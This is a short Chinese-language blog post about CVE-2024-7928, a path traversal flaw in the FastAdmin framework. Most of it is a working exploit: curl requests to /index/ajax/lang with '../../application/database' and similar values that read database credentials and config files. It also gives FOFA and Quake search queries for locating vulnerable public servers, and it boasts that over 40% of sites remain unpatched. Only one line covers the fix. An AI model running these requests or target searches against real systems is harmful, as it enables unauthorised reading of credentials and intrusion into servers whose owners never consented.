2025年了,没有修补这个漏洞的网站估计依然有百分之四十以上,成功率极高。CVE-2024-7928 指的是 FastAdmin 框架中存在的一个路径遍历(Path Traversal)漏洞。该漏洞允许未经授权的攻击者通过构造恶意的URL参数,读取服务器上任意文件,包括敏感的配置文件、源代码等。
该漏洞的测试方法非常简单,执行以下命令就可以。要求FastAdmin < 1.3.4.20220530版本。
curl -k https://域名/index/ajax/lang?lang=../../application/databas,或是直接浏览器打开这个URL。
我们搭建测试环境:
执行curl -k
https://IP/index/ajax/lang?lang=
../../application/database,就会得到数据库的配置情况了,包括用户名和密码等。如果想读取其它文件,例如application目录下的config.php,就执行curl -k
https://IP/index/ajax/lang?lang=../../application/config,不要带php后缀。
公网上有很多这样的环境:
[FOFA]:icon_hash="-1036943727"或是body="/assets/js/require.js"
[Quake]:body="/assets/js/require.js"
如何修复?更新框架版本V1.3.4.20220530以上就可以。但有点可笑的是,有个人在官方问如何修补这个漏洞,官方人员竟然说在2022年就修复了。官方客服用点心回复用户好不好。